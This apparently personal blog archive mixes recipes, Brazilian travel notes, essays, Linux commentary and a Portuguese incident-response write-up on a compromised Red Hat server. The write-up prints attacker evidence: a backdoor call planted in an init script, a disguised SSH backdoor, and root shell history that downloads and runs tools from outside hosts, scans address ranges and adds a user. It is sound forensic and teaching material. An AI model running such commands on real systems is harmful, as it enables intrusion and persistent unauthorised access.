Palestrante: Mauricio Conceição (IBM)

15h40 – 16h20 Otimize seu datacenter tirando o máximo de seu hardware

Conheça arquiteturas não-convencionais, mas que trazem benefícios financeiros enormes, para
virtualização, enjaulamento de aplicações, desktops multiusuários, clusters de alta disponibilidade, de custo baixo até os mais escaláveis, clusters para Grid e alta disponibilidade, e opções para desktop.

Palestrante: Avi Alkalay (IBM)

16h30 – 17h00 Parceiro: YKP

Conheças as Soluções CRM integradas ao JD Edwards

Palestrante: YKP

17h10 – 17h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

Estando no evento, não deixe de passar no stand da IBM.

Receita de Sopa Fria de Pepino com Iogurte

Ingredientes

  • Pepinos compridos: 3
  • Copos de iogurtes: 2
  • Nozes picadas ou xerém de castanha de cajú: 150g
  • Dil (também conhecido por endro) picado: 2 colheres de sopa cheias
  • Alho amassado: 1 dente grande
  • Sal a gosto

Modo de Preparo

  1. Descasque e pique os pepinos em pedaços pequenos
  2. Junte os 2 copos de iogurte e mais 2 copos iguais de água
  3. Junte o alho amassado, a castanha de cajú ou nozes, e o dil
  4. Misture tudo e vá temperando com sal a gosto
  5. Deixe gelar na geladeira por meia hora

Serve 2 pessoas, em cumbuca e com colher de sopa. É leve, saudável e saboroso e as vezes só janto isso e fico satisfeito.

Algumas pessoas gostam de moer pimenta do reino sobre sua cumbuca, outras preferem regar um fio de azeite de oliva.

De qualquer forma, a impressão que se tem é que pepino, iogurte e alho nasceram para serem comidos juntos, de tanto que combinam.

Abraço dos Dois Irmãos

Sol atrás dos Dois IrmãosDescolei umas horas livres no fim da tarde, na praia de Ipanema.

Mergulhei perto do posto 8, no Arpoador. O mar estava pouco agitado mas muito gelado. Brrrrr: águas oceânicas.

O horário de verão terminou final de semana passado, então acho que estamos no outono. Nesta época o sol se põe exatamente atrás do Morro Dois Irmãos, que marca o fim do Leblon e o começo do Vidigal.

Conforme o sol ia baixando, formava dois enormes braços de raios com a sombra do morro no miolo. O efeito era os Dois Irmãos abraçando a cidade. Muito bonito e inspirador. E pelo jeito a cena já serviu de inspiração para outras pessoas.

Centro do mapa
no mapa
Morro Dois Irmãos
no mapa
Posto 8
no mapa
Arpoador

Enquanto assitia aquilo, parado, de pé no calçadão, pessoas passavam por mim. Um rapaz com camisa verde-amarela, andando de costas para o morro, tascou o último naco de seu espetinho-de-gato, e, exatamente em frente a um cesto de lixo grande, laranja e chamativo, lançou o espeto vazio ao ar. O espeto caiu na areia, e o papel que o envolvia foi para a calçada. Ele fez questão de não mirar no cesto !

O que faz um ser humano ter tal atitude? Ô povinho! Acabou com minha contemplação…

Mesmo assim o Rio de Janeiro continua lindo.

Nostalgia Titânica

Sabe, as vezes bate uma saudade dos velhos amigos. De épocas bem vividas. Não que os dias de hoje não sejam, mas em outros carnavais nossa mente estava em outra sintonia, que nos fazia levar a vida por caminhos diferentes.

Fico muito feliz quando conheço artistas e suas músicas que tocam minha alma diferente da média que a gente vai ouvindo por aí. Isso acontece poucas vezes por ano. E certos anos simplesmente não acontece.

Titane é uma cantora praticamente desconhecida que me levou para esse mundo da nostalgia. A saudade dos amigos que a gente pouco vê bate mais forte, ao mesmo tempo que rola uma esperança de estarmos mais próximos muito em breve.

Descobri suas músicas por aí, fui conhecendo mais e me encantei. Ela tem trabalhos que são deslumbrantes do começo ao fim. E que voz !

Zensider, de Edvaldo Santana e Ademir Assunção, era tocada às vezes na Rádio USP aqui em São Paulo, mas a Moda do Fim do Mundo, de Alice Ruiz e Chico César, do mesmo album mas jamais ouvida, é prá lá de mais interessante e melódica.

Curtam seus amigos. Agora, antes do fim do mundo.

Idealismo e Evolução

O idealismo está entre as coisas que mais faz o mundo andar para frente, e ao mesmo tempo, posiciona-se como a que mais segura a sua evolução.

O idealismo de mente aberta leva o mundo para frente. E o idealismo hermético, enclausurado, sem visão, fundamentalista, freia a evolução do mundo e da sociedade.

De qualquer forma, o idealismo como característica de personalidade, sempre vem empacotado com outras características, tais como falta de praticidade, um “não consigo terminar o que comecei”, e um altruismo que muitas vezes leva a irredutibilidade e, inevitavelmente, ao fundamentalismo.

Mas a visão mais ampla dos idealistas geralmente serve para inspirar pessoas de mente mais prática, menos cerebral, mais emocional, que pensa menos e faz mais, que enfim impulsionam a roda da história.

O progresso se faz com a mistura de personalidades idealistas (e teóricas) com as de tendência prática. Raros os líderes que tem ambas as características.

Os idealistas que enxergam 1000km no futuro e observam, durante a sua vida, a humanidade caminhar somente uns 2km para frente, devem se dar por satisfeitos. Esses 2km são exatamente o que a humanidade como um todo, hoje, é capaz de caminhar.

A evolução social, moral e benéfica não acontece a passos largos. Aos olhos dos impacientes parece até não acontecer. Mas na verdade nunca para e nunca anda para trás.

A Paradise on Earth

Last weekend we traveled to the Paraty bay area, a place that I visit since I was a kid. But this time was very special because I knew a new paradise: Saco do Mamanguá.

They say there is only one fjord in Brazil, which is the Saco do Mamanguá. To get there we traveled by car to Paraty Mirim, then took any traineira (a small and slow fisherman’s boat) that was siting on the beach waiting for tourists. You don’t have to setup an appointment or pay in advance. Just go. They use to charge R$35 per hour, for any number of persons up to about 10. We did everything in 4 wonderful hours.

Mamanguá is an 8km-long arm of the Atlantic ocean, far enough from Paraty to look as an almost untouched paradise. It has small clear water, isolated beaches, perfects for snorkeling, or simply for relaxing. In addition we were blessed by a beautiful shiny day, thats why I can’t avoid using the “paradise” word all the time.

The whole region deserves a visit, and thats why I’m writing this in english, to inspire non-brazilian folks come visit my beautiful country. But instead of a stream of words I invite you to explore the interactive map below. Click on the markers () to see more information and local photos.

Center of map
map
Saco do Mamanguá
Saco do Mamanguá
map
Paraty Mirim. A small and old village 18km far from Paraty. This is where we met Nelson and his “traineira” to take us to Saco do Mamanguá.
map
A typical building in Paraty
A typical building in Paraty
map
Le GiteFazenda Graúna. Go to Le Gite D’Indaiatiba, a beautiful pousada and restaurant by Olivier and Valerie. This restaurant is very expensive (about R$150 for two, no wine), but very good too. This place is in higher altitudes so in clear sky days you can have lunch contemplating the wonderful ocean down there.
map
TrindadeTrindade and Laranjeiras. Trindade was a small fishermen’s village that turned to be a place that many hippies go nowadays. Larangeiras is a village of very expensive and big cotages.
map
Ilha do Algodão.
map
Exit from main road (Rio-Santos, BR-101) to the road that takes to Paraty Mirim.
map
Fazenda São Roque. There is nothing here, not even a good beach, but this is where I use to stay when I go to this region. No hotels nor pousadas.
map
Thermonuclear power station of Angra dos Reis
Thermonuclear power station of Angra dos Reis.
map
TaritubaTarituba. Used to be a small village and beach where simple fishermen live and work. They still live there, but all their wives opened simple restaurants along the shore and around. Due to the excess of fishermen boats (called “traineiras” in portuguese) this beach is dirty and not apropriate for swiming. Nowadays you may find some nightlife in Tarituba on weekends or holydays.
map
Mambucaba. This is well organized village built for the engineers of the Angra Dos Reis’ thermonuclear power station. It has the most beautiful beach on the region, with clear waters. This place is almost outside the bay so you will find surfists riding the waves. This beach is always full of young people.
map
Ilha do BreuFazenda São Gonçalo. A private farm with a calm beach, good for children, easily accessible only from certain points. You’ll find places to park your car and walk for 3 minutes to the beach. If you want, you can pay R$7 per person to a fisherman and he’ll take you and your family to the Breu (the picture) or Pelado island, right in front of the beach. You will stay on clear water beaches with big stones full of aquatic wildlife. Bring your diving mask and snorkel. There is also a rustic restaurant there, where you can chill out having a caipirinha de maracujá (passion fruit caipirinha) or água de côco (coconut water) with fried fish. Don’t miss their mandioca frita (mandioca is something similar to a potato but only available in Brazil).
map
The Iriri waterfallsCachoeira do Iriri. Coming from Paraty to Rio, right before the São Gonçalo farm complex, there is an almost unaccessible beach that you will see from a hill on the road. A reference is a red and huge cellular antena. On the other side of the road there is a bus stop and a trail into the forest. A 3 minutes walk will take you to a beautiful clear water river with a natural pool and waterfalls. You will see a closed house but you are not transpassing. Just chill out there the whole afternoon after the beach. You can stay under the waterfall to heal your backs. If you feel adventurous, look for a jungle trail right on the side of the pool, going uphill. It will take you to the second floor of rocks, but there is nothing there. Keep on going up until you find the river again on the third floor. Look down and you will see your non-adventurous friends that stood on the first waterfall. Say hello and goodby, because we are not finished. Walk by the river for 3 minutes until you see a huge natural water pool with another waterfall. You’ll be probably alone there. This is a window to paradise. Just don’t miss this point.

Other things to do

  • Walk around in old Paraty area and remember that you are visiting one of the eldest places in Brazil. Enjoy the rich nightlife with live music. The city is always packed by tourists from all parts of the world.
  • Have a light vegetarian meal in the Ganges, close to the famous Pousada do Sandi. Or choose one from the tons of restaurants around. In Paraty you should have seafood.
  • Have an icecream in a place called Sorveterapia. The owner is a sort of researcher in the art of icecream making, and has developed a very light and natural formula to produce it. Very unexpensive too.
  • Going north on the BR-101 road (also known as Rio-Santos) you will find many beaches. The most important ones are marked on the map. Ask also about the big number of waterfalls. Some of them you can see from the road, coming down the mountains big and white. My preferd is Cachoeira do Iriri, hidden but marked on the map.
  • Going south thowards Ubatuba there are some famous beaches too, as Prumirim, Ubatumirim, Almada, Praia Vermelha, etc. But I don’t use to go there very much: the closer you get to Ubatuba, the crowder will be.
  • If you have an off-road car or jeep, leave Paraty to west, towards Cunha, through the old way. There are some more waterfalls on the go, nice handcraft shops, restaurants and amazing tropical landscapes. Cunha is known as home of excellent ceramicists, so look for their studios. Have a meal in the Restaurante Uruguayo.
  • You will see a lot of rain in all that region too, almost every day. This is a bless that you should contemplate quietly. The rain smells absolutely delicious over there.

Segurança em Open Source

Cezar Taurion, excelente consultor e colega de trabalho, engatou seu blog no developerWorks. Gostaria de complementar seu artigo da Linux Magazine de dezembro de 2006 com algumas aspectos sobre segurança.

Não há como afirmar que Open Source é mais seguro que Closed Source, ou que Closed Source é mais seguro que Open Source. Quem o afirma, geralmente faz por religião e não por análise fria.

Considero-me especialista em segurança, mas evito ao máximo tocar neste assunto ao falar com clientes em geral, quando o âmbito é Open Source. Só quando eles perguntam. Simplesmente porque cada um terá uma opinião, e porque nehuma opinião pode ser verdadeiramente constatada.

Vamos dividir o mundo Open Source em dois blocos. No primeiro desfilam as escolas do grupo 1, campeões de audiência como o Apache HTTP Server, Samba, boa parte do Kernel, Bind, OpenSSH, DHCP, Firefox, OpenOffice.org, libc, que são arrasadoramente populares, e literalmente seguram a festa da Internet no ar. A lista não é muito maior que essa.

E no grupo 2 ficam todos os outros projetos Open Source, disputando um lugar ao sol e na passarela das distribuições Linux. Aqui estão as dezenas de milhares de projetos abandonados do SourceForge.net, e também projetos longe da criticidade das do grupo 1, mas já um pouco mais usados, como Gnome, KDE, X.org, a outra parte do Kernel, OpenLDAP, NAS, VNC, ImageMagick, Bash, Gimp, Kopete, Gaim, libc++, libxml, ntp, e mais todo o resto que não aparece no grupo 1 mas que está instalado aí no seu computador.

Enquanto pensamos que no closed source podem haver pontos inacessivelmente inseguros e backdoors, devemos também nos perguntar se há realmente pessoas analisando todo Open Source que interessa, com enfoque em segurança. Pense no grupo 2.

Sobre segurança em Open Source, a única coisa que podemos afirmar é que o código se mantém aberto para quem quiser auditá-lo (característica que o closed source não tem e nem quer ter). Mas novamente, isso não é garantia de que suas falhas serão achadas.

No grupo 1, dos superpopulares, a estória é outra. Eles são naturalmente submetidos a stress massivo e constante do mundo real. E a dependência que muitas empresas e indivíduos tem desse grupo os leva a se relacionar de forma simbiótica com sua evolução. Usam o fato de ter o fonte disponível para auditar e contribuir melhorias.

A separação entre os grupos não é tão nítida. Usei só para ilustrar. A fronteira é na verdade uma larga faixa de projetos Open Source com diferentes graduações de popularidade, stress e uso.

É preciso ter a soma de dois aspectos para se ter a melhor segurança: código fonte aberto + extrema popularidade, sendo o último mais importante (e mais difícil de alcançar) que o primeiro.

Um closed source também tem sua chance de ser seguro. Basta a empresa que o fabrica cuidar bem de seu produto. Se ele for popular, ela tende a cobrar menos para executar este trabalho. Se for menos popular, mas ainda desejado pelos clientes, seu preço tende a ser mais alto.

O nabo é dos NETs

Complementando a estória do Antônio “LedStyle” Cláudio, eu tenho NET de 200kbps em Higienópolis. É tão bom quanto 200kpbs conseguem ser.

Mas quero aumentar a velocidade, e depoimentos como o dele dão medo. O pior de tudo é o atendimento péssimo das centrais dessas prestadoras. E o serviço é bem caro, mas vamos dizer que atribuo isso ao fato de que custo de banda core no Brasil é caríssimo.

Diga-se de passagem, meu pai colocou 2mbps em casa, com NET Fone. Ele fez uma análise meticulosa das tarifas de ligação telefônica comparando outras operadoras, e disse que o preço do minuto NET é bem mais caro. A NET diz que é mais barato. Bem, isso é uma meia verdade, somente em alguns horários, para ligações locais muito curtas. Como diz o ditado, uma meia verdade é uma mentira.

Antes eu tinha o Giro, da Vesper/Embratel. 300kbps de baixa qualidade que vinham através de um modem sem fio que usava a infraestrutura CDMA da Vesper, e era conectado por USB no computador, e tinha suporte ruim para Linux.

Por ironia do destino, o atendimento telefônico do Giro da Vesper era ótimo. Atendentes sinceros, com bom conhecimento técnico e que retornavam ligações depois de fazer análises bem feitas. Fiz questão de registrar isso quando infelizmente cancelei o serviço porque sua tecnologia não me atendia.

OSDL Linux Client Survey Analysis is Out

On January 25th the OSDL released their 2006 Linux client survey analysis, which identified the following barriers for Linux deployment on desktops:

  1. Application availability
  2. Quality of peripheral support
  3. End user training
  4. Desktop management issue

It is not that applications don’t exist for the Linux desktop, but users grow accustomed to certain applications that they just can’t live without.

Users report they are missing applications as Microsoft Office (OpenOffice.org is the alternative), Adobe Photoshop (which has The Gimp as the closest, but still far alternative), AutoCAD (with QCad as a very far similar) and others.

For peripherals, this is the list:

  1. Printers
  2. Personal storage devices (i.e. USB memory)
  3. Scanners
  4. Digital cameras
  5. Mail and messaging devices
  6. Web cam / video
  7. Smartphones

However, it is still difficult to buy a printer at your local electronics store and expect it to work out of the box on a Linux machine. While most printers are supported on Linux, there is still a lag from the time when a printer hits the market to when the driver driver is available and automatically installed on your computer by a commercial distro update.

And as a Linux user, I must add that when the device works, it usually won’t work with its full set of capabilities, because drivers are usually written by third parties on the OSS world – and not by their manufacturers, which are expected to have a much deeper knowledge (and project commitment) on these hardware capabilities.

So the problem is a committed application and drivers development. Well, how can companies commit themselves to develop desktop software (which means friendly to non-technicall users) in a world that had not decided yet about some elementary standards? Yes, there is the FreeDesktop.org initiative but the standards they are focused on are more related to KDE-Gnome interoperability.

Most important standards that must be defined will find their home in a layer bellow: LSB. But unfortunately, the Linux Standard Base still has a big job to finish and still seems to have difficulties to catch up with ISVs.

As an example, there is no de facto standard defined for things as trivial as a configuration files format for the whole system, not only for desktop apps. This is particularly important because configurations are what makes software run in a specific way. They are the soul of any software (while code is the body). A popular standard for configurations will provide ways for any software to collaborate with, and auto-configure any other software. On Windows, this was successfully achieved with its registry. On Linux, similar but broader and better alternatives exist (as the Elektra Initiative), but this is a subject that seems to not inspire the OSS community.

Standards bodies can’t do everything alone. The community must be ready for changes, adaptations, and have courage to throw away code that was not choosed by the standard, and start focusing on what was selected to be part of it. Courage to stop reinventing the wheel. For example, on a vanilla KDE installation you will find about 4 different media players (Amarok, Juk, kboodle, noatun, etc) and 3 different plain editors (kate, kedit, kwriter). If you have Gnome installed on same system, add a few more to each class of applications (and to the icons that will appear on your menus). This is confusing, fat and bad.

Another important fact on the analysis is a 49% desktop share for Canonical’s Ubuntu Linux, against RHEL and SLED with 16% each. RHEL and SuSE are more popular on servers and are essentially and structurally different distributions, but both use RPM as their packaging system. While Ubuntu is radically different from both, based on Debian, with the DEB format for packages. A well known and well used packaging system is very important on a desktop world, because this is what guarantees an easy, painless software installations and upgrades. So if I am an ISV with limited technicall staff and time resources, how should I package my software for easy deployment? DEB or RPM? If RPM, should I focus on Red Hat or SuSE flavors? Though questions.

Application vendors cannot afford to develop, distribute, and support applications across a fragmented Linux market.

Red Hat and Novell should look at their future server market, paying attention on what is happening today on the desktop. History shows that people tend to bring to work (and to servers) what they like and use on their desktops at home. This is Ubuntu’s long term strategy and they seem to be succeeding, at least on their first phase.

Ponto de Luz

Queda d'água na pousadaDias atrás tirei umas férias curtas e resolvi conhecer o legendário Ponto de Luz, pousada zen na Serra da Mantiqueira, quase divisa entre São Paulo e Minas.

A viagem foi fácil, pela Rodovia Fernão Dias. Depois, uma bela estrada até Joanópolis e depois uns 19km de estrada de terra até a pousada. Este último trecho tem belas paisagens rurais de colinas, pomares e criação de gado. Há bastente gente morando ao longo da estrada. Havia muitas bifurcações e encruzilhadas, sempre sinalizadas com o caminho a se tomar para chegar a pousada. Saí às 11:00 de São Paulo e cheguei umas 13:30, prontinho para almoçar.

A pousada é propositadamente rústica-chique, como tantas outras por alí, em São Francisco Xavier, Gonçalves, Monteiro Lobato, etc. Como a região é montanhosa, é também cheia de rios, e a propriedade era cortada pelo Ribeirão da Vergem Escura (afluente da bacia do Rio Piracicaba) cujas pedras formavam um grande poço que convidava para um banho. Nos dias em que estive lá, a água estava um pouco barrenta por causa das chuvas, mas em outras épocas o rio tem águas cristalinas. Há um belo caminho aberto até o rio, e perto da margem colocaram uns assentos que serviam para nada além da pura contemplação da natureza.

Centro do Mapa
no mapa
Hotel Ponto de Luz

(interaja com o mapa)

Rede na varanda do quartoA grande sacada do arquiteto foi construir a pousada na encosta do morro. Isso funcionava bem para dar vista alta, de qualquer ponto da pousada, para o outro lado do rio e para colinas verdejantes e arborizadas. Inclusive do refeitório e da varanda dos quartos com sua rede de balanço.

E falando nisso, a comida era bem simples mas muito gostosa, essencialmente vegetariana, às vezes com uma opção de frango ou peixe. Sempre havia sobremesas dietéticas. O serviço era ótimo, atencioso, e a inclinação exotérica da pousada parecia plantar uma consciência holística nos funcionários.

Só o preço foi na minha opinião um pouco além da conta. R$204 pela diária, incluindo as 3 refeições mais o lanche da tarde. Por pessoa. Estou acostumado a viajar pela região e sei que os preços não são bem esses. Mas calculei que no valor há uma boa lapa de moda de turismo exotérico. Aí fiquei surpreso que no final ainda me convidaram a pagar 10% de taxa de serviço opcional que é dividida entre os funcionários no final do mês. Argumentei que a pousada como um todo já era um serviço, e que não fazia sentido uma taxa de serviço sobre um serviço que por sinal já estava bem pago. Acabei sucumbindo porque continuar a discussão ia ser constrangedor para a situação. Terminou mal explicado.

Havia uma agenda de atividades diárias, com caminhada leve de manhã, algum tipo de hidroginástica antes do almoço e meditação no fim do dia, logo depois do lanche da tarde. Experimentei lá, pela primeira vez, a meditação dinâmica, especialmente desenhada para pessoas estressadas da cidade grande, como eu. Bem legal. Mas, como toda meditação, exige disciplina para se fazer todos os dias. No segundo dia meditamos num pequeno templo charmoso, construido a toque de caixa para a visita de um guru indiano.

TerapiasDepois da meditação dava um pulo na piscina aquecida onde ficava de molho até a noite. O clima não estava convidativo para a piscina aberta e fria. O resto do tempo passava na rede da varanda do quarto, lendo, ouvindo música e observando as colinas tranqüilamente. Ou dava uma olhada na lojinha anexa, cheia de coisas no melhor estilo “além-da-lenda” (a coleção de CDs para vender era ótima, e levei alguns títulos). Ou ainda pode-se fazer uma das terapias e massagens disponíveis em seu cardápio de serviços, cobrados a parte, claro. Nos finais de semana parece que há palestras e atividades musicais, mas infelizmente não pude ficar para ver.

O pessoal da pousada conta que há hóspedes que reclamam que não há “nada” para fazer lá, nem telefone, nem TV, e acabam fugindo de volta para sua cidade agitada.

Bem, eu não sofro desse mal e ficaria lá pelo tempo que fosse, porque o Ponto de Luz é um lugar de paz contemplativa.

Receita de Quiabo Atomatado

Quiabos

Ingredientes

  • ½ kilo de quiabo, de preferência os menores
  • 2 latas de tomates inteiros despelados
  • ½ cebola picada
  • Azeite extra virgem
  • 2 pitadas de páprica picante (opcional)
  • Adoçante ou açucar
  • Sal a gosto

Modo de Preparo

  1. Limpe os quiabos removendo com uma faca a parte externa escura da circunferência de sua cabeça, mas não remova a cabeça inteira. Lave e deixe escorrer.
  2. Pique um pouco os tomates mas deixe pedaços para contarem a história.
  3. Refogue a cebola em um pouco de azeite e acrescente o purê de tomate.
  4. Adicione o quiabo, cortando os maiores no meio já sobre a panela.
  5. Adicione sal a gosto, a páprica picante, e umas 10 gotas de adoçante ou o equivalente em açucar.
  6. Adicione 2 dedos de água e misture bem. Cozinhe em fogo baixo, com a panela tampada por 15 minutos.
  7. Destampe, continue mexendo com fogo baixo por mais uns 15 minutos, até o tomate reduzir (secar) ao ponto de não sobrar molho mas só pedaços molhados de tomate.

A páprica picante combina muito bem com o leve sabor adocicado fortalecido pelo tomate. E o quiabo…. ah, o quiabo….

Sirva frio ou quente.

Na Trilha do Invasor

Qualquer administrador de firewall pode observar em seus registros que uma máquina conectada à Internet não fica um minuto sequer, 24 horas por dia, livre de tentativas de invasão. Tem sempre alguém fazendo uma varredura, tentando algum tipo estranho de conexão, requisitando URLs inseguras aos servidores web, enfim, batendo na porta. Parece que as pessoas têm se protegido bem já que não lembro de ter ouvido histórias detalhadas sobre um ataque efetivamente acontecendo.

Tive a oportunidade de analisar um computador que foi invadido e vou relatar aqui as evidências que os crackers deixaram para trás, como as descobrimos, e o que lhes interessava naquela máquina. Vou usar nomes fictícios e mascarar alguns IPs para resguardar a privacidade de todos.

Vamos chamar os invasores de crackers, porque hackers somos todos nós que respiramos tecnologia, “fuçadores” (tradução da palavra hacker), exploradores, pessoas curiosas. Somos todos hackers porque usamos nossas mentes poderosas para resolver problemas, ganhar dinheiro licitamente, enfim, fazer o bem. Um cracker por outro lado, usa seu conhecimento para invadir, deteriorar, tirar vantagem, e dar trabalho aos hackers administradores de redes. Um cracker é um mau hacker, e um bom hacker pode impedir a ação de um cracker.

Os Rastros Deixados pelo Cracker

O servidor em questão era uma máquina de testes internos na empresa A, que em determinado momento foi deslocada para um novo teste conectada à Internet, sem uma reinstalação. Tudo começou quando, poucas semanas após estar conectada à Internet, uma empresa que chamaremos de B, enviou um e-mail para P (provedor do link físico para a máquina atacada) informando que detectou uma tentativa de ataque, e requisitou um retorno. P encaminhou o e-mail para A, e esse continha alguns logs com a prova da tentativa de invasão:

Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:26:27 sshd[PID]: refused connect from  IP.IP.IP.IP

Eles mostravam que o IDS (Intrusion Detection System) de B acusou que a máquina atacada (cujo endereço IP está representado por IP.IP.IP.IP) tentou se logar várias vezes sem sucesso em seu serviço SSH (sshd). Reparem que o instante de todas as tentativas, até os segundos, é o mesmo, o que leva a crer que não é um ser humano, e sim algum software que muito rapidamente está testando várias combinações de usuário e senha ao mesmo tempo.

Histórico do Ataque

Fui chamado para dar explicações porque havia fornecido informalmente por telefone algumas dicas de como proteger a máquina. Primeiramente, era necessário dar subsídios ao provedor P para responder ao e-mail de B, dando uma satisfação formal. Isso é uma atitude de responsabilidade de um bom administrador de rede, e demonstra a preocupação em manter o nível de serviço da Internet o mais alto possível.

A máquina foi colocada em quarentena, desligada da Internet e começamos a analisá-la. Tratava-se de um Red Hat Enterprise Linux 3 Update 5. Não estou dizendo que o Red Hat Linux é menos ou mais seguro. Isso não é muito intuitivo de se entender, mas segurança não tem quase nada a ver com o software. Segurança não é um firewall, não é criptografia, nem um conjunto de produtos que tem proteção como objetivo. Segurança é um processo que deve ser seguido conscientemente por administradores de redes. Se um ataque acontece, toda a responsabilidade é do administrador, e não do sistema operacional, seja ele qual for, e do fabricante que for. O administrador precisava agora descobrir como o cracker invadiu para, corajosamente, assumir a falha e não permitir que isso aconteça novamente.

Logo no boot da máquina observamos consecutivas mensagens estranhas que não deviam estar lá e que continham o texto “(swap)”. Começamos a analisar o processo de inicialização do sistema, a partir do arquivo /etc/inittab. Vimos que um dos primeiros scripts que são executados no sistema é o /etc/init.d/functions e fizemos os seguintes testes:

bash$ rpm -qf /etc/init.d/functions
initscripts-7.93.20.EL
bash$ rpm -V initscripts
S.5....T c /etc/rc.d/init.d/functions

Verificamos que este arquivo faz parte (rpm -qf) do pacote initscripts, e em seguida testamos sua integridade (rpm -V). Descobrimos que o arquivo foi alterado: o número 5 significa que o MD5 do arquivo mudou, ou, em outras palavras, que o conteúdo do arquivo mudou. O RPM sabe disso comparando o MD5 do arquivo atual no disco, com o MD5 registrado em seu banco de dados no momento da instalação do pacote.

Mas o que foi alterado no script functions ?

A última linha do script era esta:

/usr/bin/crontabs -t1 -X53 -p

Suspeitamos imediatamente porque o comando crontab não se chama “crontabs”. Confirmamos novamente com o RPM:

bash$ rpm -qf /usr/bin/crontabs
o ficheiro /usr/bin/crontabs não pertence a nenhum pacote

Pronto. Estava constatado que esse tal comando crontabs era alienígena e não deveria estar ali. Foi, com certeza, implantado pelo cracker. Mas não paramos aqui. Queríamos saber o que este programa fazia. Como era um binário, tentamos extrair algumas strings dele:

bash$ strings /usr/bin/crontabs
[...]
"smbd -D"
"(swapd)" &
[...]

Ou seja, era este tal crontabs que mandava para a tela as mensagens com a string “(swap)”. Mas descobrimos outra coisa: o alienígena continha também a string “smbd -D”, que se parece com o nome do serviço do Samba. Nem perdemos tempo usando os comandos ps e top para verificar se um processo chamado smbd estava rodando porque usamos os mesmos rpm -qf e rpm -V para constatar que estes programas também foram modificados pelo cracker. Usamos o utilitário gráfico ksysguard (que não foi modificado) do KDE e pudemos observar um tal processo smbd -D rodando. Chamou a atenção que o ksysguard mostrava todos os processos executando sem seus parâmetros, e somente o smbd apresentava um parâmetro. Não tardou a acharmos um arquivo chamado “/usr/bin/smbd -D” (com espaço e parâmetro mesmo), e o RPM novamente nos informou que ele não fazia parte de nenhum pacote. Tratava-se de outro programa do cracker. Fomos lá tentar extrair mais algumas informações sobre este programa:

bash$ strings “/usr/bin/smbd -D"
[...]
Received SIGHUP; restarting.
Generating new %d bit RSA key.
RSA key generation complete.
   -b bits    Size of server RSA key (default: 768 bits)
By-ICE_4_All ( Hackers Not Allowed! )
SSH-%d.%d-%.50s
This server does not support your new ssh version.
Sent %d bit public key and %d bit host key.
sshd version %.100s [%.100s]
[...]

Omitimos diversas linhas para ser mais didático. A linha vermelha eliminou qualquer dúvida se um cracker havia visitado a máquina ou não. Mas o mais interessante são as linhas azuis, que levaram a crer que o famigerado programa smbd -D era um servidor SSH. O cracker deveria querer isso para manter um backdoor aberto, e poder logar com SSH quando quisesse. Em /var/log/messages encontramos a evidência final:

Feb  19 19:24:49 localhost smbd -D: RSA1 key generation succeeded
Feb  19 19:24:50 localhost smbd -D: RSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D: DSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D:  succeeded

Essas são mensagens típicas de um daemon SSH sendo executado pela primeira vez, quando cria suas chaves únicas de criptografia, só que bizarramente emitidas por um suposto programa com nome de Samba, o que não faz sentido algum e é forte indício que há algo errado no sistema. Ou seja, o cracker implantou um backdoor SSH, porém com um nome mascarado para seu arquivo e processo (smbd). A partir desses registros pudemos também estimar a data em que a máquina foi atacada: 19 de fevereiro.

Para o cracker poder alterar arquivos e comandos tão importantes do sistema, ele deve ter conseguido acesso de root, e por isso fomos espiar o histórico de comandos executados por este usuário no arquivo /root/.bash_history, e vimos isto:

bash# less /root/.bash_history
[...]
cd /usr/share/.a
wget lamisto.octopis.com/mig.tgz
tar xzvf mig.tgz
./mig g-u root -n 0
./mig -u root -n 0
cd /usr/share/.a
wget utilservices.iasi.rdsnet.ro/~marianu/flo.tgz
tar xzvf flo.tgz...linhas omitidas...
cd /var/tmp
wget djanda.com/get/usr.tar.gz
wget djanda.com/get/x.tar.gz
tar xfvz usr.tar.gz
cd usr
chmod +rwxrwxrwx *
./crond
cd ..
tar xfvz x.tar.gz
cd x
chmod +rwxrwxrwx *
mv unix x
./x 201.20; ./x 201.21; ./x 201.22; ./x 201.23; ./x 201.24; ./x 201.25; ./x 201. 26; ./x 201.27; ./x 201.28; ./x 201.29; ./x 201.30; ./x 201.31; ./x 201.32; ./x 201.33; ./x 201.34; ./x 201.35; ./x 201.36; ./x 201.37; ./x 201.38; ./x 201.39; ./x 201.40; ./x 201.41; ./x 201.42; ./x 201.43; ./x 201.44; ./x 201.45; ./x 201. 46; ./x 201.47; ./x 201.48; ./x 201.49; ./x 201.50
[...]
/usr/sbin/adduser scanning

O formato do arquivo não permite saber quando esses comandos foram executados, mas fica evidente que o cracker criou um usuário chamado scanning, baixou arquivos de certos sites, abriu-os e executou comandos que vieram com eles. Analisamos cada um, e descobrimos que:

  • No diretório /usr/share/.a ele instalou e executou o tal comando mig que aparentemente é um limpador de histórico de login do sistema. Usamos o mesmo comando strings para analisar esse binário. Isso confirmou nossa estimativa da data de ataque pois o comando last (usado para verificar esse histórico) apontou dados inconsistentes por volta de 19 de fevereiro.
  • Em /var/tmp foi baixado um tal usr.tar.gz, que aparentemente é um bot de IRC. Mais tarde, com os mesmos comandos do RPM, descobrimos que o comando /bin/netstat também foi alterado, provavelmente para esconder as conexões deste bot a diversos servidores de IRC na porta padrão 6667, o que constatamos com o ksysguard. Adiante explicaremos o que um cracker faz com isso.

